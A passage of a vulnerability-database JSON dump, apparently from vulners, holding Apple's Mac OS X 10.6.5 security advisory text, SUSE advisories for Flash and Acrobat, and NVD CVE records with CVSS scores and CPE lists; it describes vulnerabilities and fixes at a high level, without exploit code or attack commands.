Server\r\n\r\n CVE-ID: CVE-2010-3783\r\n\r\n Available for: Mac OS X Server v10.5.8, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: A remote attacker may be able to log in with an outdated password\r\n\r\n Description: An implementation issue in Password Server's handling of replication may cause passwords to not be replicated. A remote attacker may be able to log in to a system using an outdated password. This issue is addressed through improved handling of password replication. This issue only affects Mac OS X Server systems. 
Credit: Apple.\r\n\r\n *\r\n\r\n PHP\r\n\r\n CVE-ID: CVE-2010-0397, CVE-2010-2531\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Multiple vulnerabilities in PHP 5.3.2\r\n\r\n Description: PHP is updated to version 5.3.3 to address multiple vulnerabilities, the most serious of which may lead to arbitrary code execution. Further information is available via the PHP website at http://www.php.net/\r\n\r\n *\r\n\r\n PHP\r\n\r\n CVE-ID: CVE-2010-0397, CVE-2010-2531, CVE-2010-2484\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8\r\n\r\n Impact: Multiple vulnerabilities in PHP 5.2.12\r\n\r\n Description: PHP is updated to version 5.2.14 to address multiple vulnerabilities, the most serious of which may lead to arbitrary code execution. Further information is available via the PHP website at http://www.php.net/\r\n\r\n *\r\n\r\n Printing\r\n\r\n CVE-ID: CVE-2010-3784\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Applications that use the PMPageFormatCreateWithDataRepresentation API may be vulnerable to an unexpected application termination\r\n\r\n Description: A null dereference issue exists in the PMPageFormatCreateWithDataRepresentation API's handling of XML data. Applications that use this API may be vulnerable to an unexpected application termination. This issue is addressed through improved handling of XML data. 
Credit to Wujun Li of Microsoft for reporting this issue.\r\n\r\n *\r\n\r\n python\r\n\r\n CVE-ID: CVE-2009-4134, CVE-2010-1449, CVE-2010-1450\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Python applications using the rgbimg and audioop modules may be vulnerable to an unexpected application termination or arbitrary code execution.\r\n\r\n Description: Multiple integer overflows exist in python's rgbimg and audioop modules. Python applications using the rgbimg and audioop modules may be vulnerable to an unexpected application termination or arbitrary code execution. These issues are addressed through improved bounds checking.\r\n\r\n *\r\n\r\n QuickLook\r\n\r\n CVE-ID: CVE-2010-3785\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Downloading a maliciously crafted Microsoft Office file may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A buffer overflow exists in QuickLook's handling of Microsoft Office files. Downloading a maliciously crafted Microsoft Office file may lead to an unexpected application termination or arbitrary code execution. This update addresses the issue through improved bounds checking. Credit: Apple.\r\n\r\n *\r\n\r\n QuickLook\r\n\r\n CVE-ID: CVE-2010-3786\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Downloading a maliciously crafted Excel file may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A memory corruption issue exists in QuickLook's handling of Excel files. Downloading a maliciously crafted Excel file may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved bounds checking. 
This issue does not affect systems prior to Mac OS X v10.6. Credit to Tobias Klein, working with VeriSign iDefense Labs for reporting this issue.\r\n\r\n *\r\n\r\n QuickTime\r\n\r\n CVE-ID: CVE-2010-3787\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Viewing a maliciously crafted JP2 image may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A heap buffer overflow exists in QuickTime's handling of JP2 images. Viewing a maliciously crafted JP2 image may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved bounds checking. Credit to Nils of MWR InfoSecurity for reporting this issue.\r\n\r\n *\r\n\r\n QuickTime\r\n\r\n CVE-ID: CVE-2010-3788\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Viewing a maliciously crafted JP2 image may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: An uninitialized memory access issue exists in QuickTime's handling of JP2 images. Viewing a maliciously crafted JP2 image may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved validation of JP2 images. Credit to Damian Put and Procyun, working with TippingPoint's Zero Day Initiative for reporting this issue.\r\n\r\n *\r\n\r\n QuickTime\r\n\r\n CVE-ID: CVE-2010-3789\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Viewing a maliciously crafted avi file may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A memory corruption issue exists in QuickTime's handling of avi files. Viewing a maliciously crafted avi file may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved handling of avi files. 
Credit to Damian Put working with TippingPoint's Zero Day Initiative for reporting this issue.\r\n\r\n *\r\n\r\n QuickTime\r\n\r\n CVE-ID: CVE-2010-3790\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Viewing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A memory corruption issue exists in QuickTime's handling of movie files. Viewing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved handling of movie files. Credit to Honggang Ren of Fortinet's FortiGuard Labs for reporting this issue.\r\n\r\n *\r\n\r\n QuickTime\r\n\r\n CVE-ID: CVE-2010-3791\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Viewing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A buffer overflow exists in QuickTime's handling of MPEG encoded movie files. Viewing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved bounds checking. Credit to an anonymous researcher working with TippingPoint's Zero Day Initiative for reporting this issue.\r\n\r\n *\r\n\r\n QuickTime\r\n\r\n CVE-ID: CVE-2010-3792\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Viewing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A signedness issue exists in QuickTime's handling of MPEG encoded movie files. Viewing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved handling of MPEG encoded movie files. 
Credit to an anonymous researcher working with TippingPoint's Zero Day Initiative for reporting this issue.\r\n\r\n *\r\n\r\n QuickTime\r\n\r\n CVE-ID: CVE-2010-3793\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Viewing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A memory corruption issue exists in the handling of Sorenson encoded movie files. Viewing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved validation of Sorenson encoded movie files. Credit to an anonymous researcher working with TippingPoint's Zero Day Initiative and Carsten Eiram of Secunia Research for reporting this issue.\r\n\r\n *\r\n\r\n QuickTime\r\n\r\n CVE-ID: CVE-2010-3794\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Viewing a maliciously crafted FlashPix image may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: An uninitialized memory access issue exists in QuickTime's handling of FlashPix images. Viewing a maliciously crafted FlashPix image may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved memory management. Credit to an anonymous researcher working with TippingPoint's Zero Day Initiative for reporting this issue.\r\n\r\n *\r\n\r\n QuickTime\r\n\r\n CVE-ID: CVE-2010-3795\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Viewing a maliciously crafted GIF image may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: An uninitialized memory access issue exists in QuickTime's handling of GIF images. 
Viewing a maliciously crafted GIF image may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved memory management. Credit to an anonymous researcher working with TippingPoint's Zero Day Initiative for reporting this issue.\r\n\r\n *\r\n\r\n Safari RSS\r\n\r\n CVE-ID: CVE-2010-3796\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Accessing a maliciously crafted "feed:" URL may lead to the disclosure of sensitive information\r\n\r\n Description: Java applets are allowed in RSS feeds. Since Java applets can modify the loading DOM, accessing a maliciously crafted "feed:" URL may lead to the disclosure of sensitive information. This issue is addressed by disallowing Java applets in RSS feeds. Credit to Jason Hullinger of IOActive for reporting this issue.\r\n\r\n *\r\n\r\n Time Machine\r\n\r\n CVE-ID: CVE-2010-1803\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: A remote attacker may access a user's Time Machine information\r\n\r\n Description: The user may designate a remote AFP volume to be used for Time Machine backups. Time Machine does not verify that the same physical device is being used for subsequent backup operations. An attacker who is able to spoof the remote AFP volume can gain access to the user's backup information. This issue is addressed by verifying the unique identifier associated with a disk for backup operations. This issue does not affect Mac OS X v10.5 systems. Credit to Renaud Deraison of Tenable Network Security, Inc. 
for reporting this issue.\r\n\r\n *\r\n\r\n Wiki Server\r\n\r\n CVE-ID: CVE-2010-3797\r\n\r\n Available for: Mac OS X Server v10.5.8, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: A user who can edit wiki pages may obtain the credentials of other users\r\n\r\n Description: A JavaScript injection issue exists in Wiki Server. A user who can edit wiki pages may obtain the credentials of any user who visits the edited pages. This issue is addressed through improved input validation. This issue only affects Mac OS X Server systems. Credit: Apple.\r\n\r\n *\r\n\r\n X11\r\n\r\n CVE-ID: CVE-2010-1205, CVE-2010-2249, CVE-2010-0205\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Multiple vulnerabilities in libpng version 1.2.41\r\n\r\n Description: Multiple vulnerabilities exist in libpng version 1.2.42, the most serious of which may lead to arbitrary code execution. These issues are addressed by updating to version 1.2.44. Further information is available via the libpng website at http://www.libpng.org/pub/png/libpng.html\r\n\r\n *\r\n\r\n X11\r\n\r\n CVE-ID: CVE-2009-0946, CVE-2010-2497, CVE-2010-2498, CVE-2010-2499, CVE-2010-2500, CVE-2010-2519, CVE-2010-2520, CVE-2010-2805, CVE-2010-2806, CVE-2010-2807, CVE-2010-2808, CVE-2010-3053, CVE-2010-3054\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Multiple vulnerabilities in FreeType 2.3.9\r\n\r\n Description: Multiple vulnerabilities exist in FreeType 2.3.9, the most serious of which may lead to arbitrary code execution when processing a maliciously crafted font. These issues are addressed by updating FreeType to version 2.4.2. 
Further information is available via the FreeType site at http://www.freetype.org/\r\n\r\n *\r\n\r\n xar\r\n\r\n CVE-ID: CVE-2010-3798\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Extracting a maliciously crafted xar archive may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A heap buffer overflow exists in xar. Extracting a maliciously crafted xar archive may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved bounds checking. This issue does not affect systems prior to Mac OS X v10.6. Credit: Apple.\r\n\r\n", "edition": 1, "modified": "2010-11-18T00:00:00", "published": "2010-11-18T00:00:00", "id": "SECURITYVULNS:DOC:25153", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:25153", "title": "About the security content of Mac OS X v10.6.5 and Security Update 2010-007", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "suse": [{"lastseen": "2016-09-04T12:19:55", "bulletinFamily": "unix", "cvelist": ["CVE-2010-3648", "CVE-2010-3640", "CVE-2010-3651", "CVE-2010-3644", "CVE-2010-3639", "CVE-2010-3654", "CVE-2010-3637", "CVE-2010-3645", "CVE-2010-3638", "CVE-2010-3652", "CVE-2010-3636", "CVE-2010-3641", "CVE-2010-3976", "CVE-2010-3650", "CVE-2010-3647", "CVE-2010-3643", "CVE-2010-3646", "CVE-2010-3642", "CVE-2010-3649"], "description": "Adobe Flash Player was updated to version 10.1.102.64 to fix a critical security issue.\n#### Solution\nThere is no known workaround, please install the update packages.", "edition": 1, "modified": "2010-11-05T13:12:10", "published": "2010-11-05T13:12:10", "id": "SUSE-SA:2010:055", "href": "http://lists.opensuse.org/opensuse-security-announce/2010-11/msg00002.html", "title": "remote code execution in flash-player", "type": "suse", "cvss": {"score": 9.3, "vector": 
"AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:18:58", "bulletinFamily": "unix", "cvelist": ["CVE-2010-4091", "CVE-2010-3654"], "description": "Specially crafted PDF documents could crash acroread or lead to execution of arbitrary code. acroread was updated to version 9.4.1 which addresses the issues.\n#### Solution\nThere is no known workaround, please install the update packages.", "edition": 1, "modified": "2010-12-08T17:17:01", "published": "2010-12-08T17:17:01", "id": "SUSE-SA:2010:058", "href": "http://lists.opensuse.org/opensuse-security-announce/2010-12/msg00001.html", "title": "remote code execution in acoread", "type": "suse", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cve": [{"lastseen": "2020-12-09T19:34:43", "description": "Unspecified vulnerability in Adobe Flash Player before 9.0.289.0 and 10.x before 10.1.102.64 on Windows, Mac OS X, Linux, and Solaris, and 10.1.95.1 on Android, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unknown vectors, a different vulnerability than CVE-2010-3640, CVE-2010-3641, CVE-2010-3642, CVE-2010-3643, CVE-2010-3645, CVE-2010-3646, CVE-2010-3647, CVE-2010-3648, CVE-2010-3649, CVE-2010-3650, and CVE-2010-3652.", "edition": 6, "cvss3": {}, "published": "2010-11-07T22:00:00", "title": "CVE-2010-3644", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-3644"], 
"modified": "2019-10-09T23:01:00", "cpe": ["cpe:/a:adobe:flash_player:10.1.95.1"], "id": "CVE-2010-3644", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3644", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:adobe:flash_player:10.1.95.1:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:34:43", "description": "Unspecified vulnerability in Adobe Flash Player before 9.0.289.0 and 10.x before 10.1.102.64 on Windows, Mac OS X, Linux, and Solaris, and 10.1.95.1 on Android, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unknown vectors, a different vulnerability than CVE-2010-3640, CVE-2010-3641, CVE-2010-3643, CVE-2010-3644, CVE-2010-3645, CVE-2010-3646, CVE-2010-3647, CVE-2010-3648, CVE-2010-3649, CVE-2010-3650, and CVE-2010-3652.", "edition": 6, "cvss3": {}, "published": "2010-11-07T22:00:00", "title": "CVE-2010-3642", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-3642"], "modified": "2019-10-09T23:01:00", "cpe": ["cpe:/a:adobe:flash_player:10.1.95.1"], "id": "CVE-2010-3642", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3642", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:adobe:flash_player:10.1.95.1:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:34:43", "description": "Unspecified vulnerability in Adobe Flash Player before 9.0.289.0 and 10.x before 10.1.102.64 on Windows, Mac OS X, Linux, and 
Solaris, and 10.1.95.1 on Android, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unknown vectors, a different vulnerability than CVE-2010-3640, CVE-2010-3641, CVE-2010-3642, CVE-2010-3643, CVE-2010-3644, CVE-2010-3645, CVE-2010-3646, CVE-2010-3647, CVE-2010-3648, CVE-2010-3650, and CVE-2010-3652.", "edition": 6, "cvss3": {}, "published": "2010-11-07T22:00:00", "title": "CVE-2010-3649", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-3649"], "modified": "2019-10-09T23:01:00", "cpe": ["cpe:/a:adobe:flash_player:10.1.95.1"], "id": "CVE-2010-3649", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3649", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:adobe:flash_player:10.1.95.1:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T11:57:29", "description": "storage/innobase/dict/dict0crea.c in mysqld in Oracle MySQL 5.1 before 5.1.49 allows remote authenticated users to cause a denial of service (assertion failure) by modifying the (1) innodb_file_format or (2) innodb_file_per_table configuration parameters for the InnoDB storage engine, then executing a DDL statement.", "edition": 4, "cvss3": {}, "published": "2011-01-11T20:00:00", "title": "CVE-2010-3676", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, 
"obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-3676"], "modified": "2019-12-17T20:23:00", "cpe": ["cpe:/a:oracle:mysql:5.1.44", "cpe:/a:mysql:mysql:5.1.34", "cpe:/a:mysql:mysql:5.1.23", "cpe:/a:oracle:mysql:5.1.13", "cpe:/a:oracle:mysql:5.1.28", "cpe:/a:oracle:mysql:5.1.40", "cpe:/a:oracle:mysql:5.1.17", "cpe:/a:oracle:mysql:5.1.30", "cpe:/a:oracle:mysql:5.1.21", "cpe:/a:oracle:mysql:5.1.36", "cpe:/a:oracle:mysql:5.1", "cpe:/a:oracle:mysql:5.1.16", "cpe:/a:oracle:mysql:5.1.48", "cpe:/a:mysql:mysql:5.1.31", "cpe:/a:oracle:mysql:5.1.24", "cpe:/a:oracle:mysql:5.1.29", "cpe:/a:oracle:mysql:5.1.37", "cpe:/a:oracle:mysql:5.1.3", "cpe:/a:mysql:mysql:5.1.37", "cpe:/a:oracle:mysql:5.1.27", "cpe:/a:oracle:mysql:5.1.8", "cpe:/a:oracle:mysql:5.1.11", "cpe:/a:oracle:mysql:5.1.38", "cpe:/a:oracle:mysql:5.1.25", "cpe:/a:oracle:mysql:5.1.35", "cpe:/a:oracle:mysql:5.1.14", "cpe:/a:oracle:mysql:5.1.1", "cpe:/a:oracle:mysql:5.1.2", "cpe:/a:oracle:mysql:5.1.4", "cpe:/a:oracle:mysql:5.1.18", "cpe:/a:oracle:mysql:5.1.10", "cpe:/a:oracle:mysql:5.1.12", "cpe:/a:oracle:mysql:5.1.39", "cpe:/a:oracle:mysql:5.1.42", "cpe:/a:oracle:mysql:5.1.34", "cpe:/a:oracle:mysql:5.1.22", "cpe:/a:mysql:mysql:5.1.32", "cpe:/a:oracle:mysql:5.1.26", "cpe:/a:oracle:mysql:5.1.43", "cpe:/a:oracle:mysql:5.1.19", "cpe:/a:oracle:mysql:5.1.9", "cpe:/a:oracle:mysql:5.1.45", "cpe:/a:oracle:mysql:5.1.41", "cpe:/a:oracle:mysql:5.1.15", "cpe:/a:oracle:mysql:5.1.47", "cpe:/a:oracle:mysql:5.1.33", "cpe:/a:mysql:mysql:5.1.5", "cpe:/a:oracle:mysql:5.1.6", "cpe:/a:oracle:mysql:5.1.23", "cpe:/a:oracle:mysql:5.1.46", "cpe:/a:oracle:mysql:5.1.20", "cpe:/a:oracle:mysql:5.1.7", "cpe:/a:oracle:mysql:5.1.31"], 
"id": "CVE-2010-3676", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3676", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:oracle:mysql:5.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.43:sp1:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.30:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.25:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.33:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.27:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.20:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.1.34:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.39:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.44:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.22:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.38:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.46:sp1:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.42:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.18:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.45:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.36:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.1.23:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.40:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.28:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.1.37:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.48:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.34:sp1:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.11:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.43:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.41:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.21:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.13:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.31:sp1:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.26:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.23:a:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.24:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.47:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.7:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.1.32:*:*:*:*:*:*:*", 
"cpe:2.3:a:oracle:mysql:5.1.46:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.12:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.9:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.19:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.40:sp1:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.1.31:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.10:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.37:sp1:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.16:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.29:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.14:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.35:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.17:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.15:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:34:43", "description": "Unspecified vulnerability in Adobe Flash Player before 9.0.289.0 and 10.x before 10.1.102.64 on Windows, Mac OS X, Linux, and Solaris, and 10.1.95.1 on Android, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unknown vectors, a different vulnerability than CVE-2010-3640, CVE-2010-3641, CVE-2010-3642, CVE-2010-3644, CVE-2010-3645, CVE-2010-3646, CVE-2010-3647, CVE-2010-3648, CVE-2010-3649, CVE-2010-3650, and CVE-2010-3652.", "edition": 6, "cvss3": {}, "published": "2010-11-07T22:00:00", "title": "CVE-2010-3643", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-3643"], 
"modified": "2019-10-09T23:01:00", "cpe": ["cpe:/a:adobe:flash_player:10.1.95.1"], "id": "CVE-2010-3643", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3643", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:adobe:flash_player:10.1.95.1:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:34:43", "description": "Unspecified vulnerability in Adobe Flash Player before 9.0.289.0 and 10.x before 10.1.102.64 on Windows, Mac OS X, Linux, and Solaris, and 10.1.95.1 on Android, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unknown vectors, a different vulnerability than CVE-2010-3640, CVE-2010-3641, CVE-2010-3642, CVE-2010-3643, CVE-2010-3644, CVE-2010-3646, CVE-2010-3647, CVE-2010-3648, CVE-2010-3649, CVE-2010-3650, and CVE-2010-3652.", "edition": 6, "cvss3": {}, "published": "2010-11-07T22:00:00", "title": "CVE-2010-3645", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 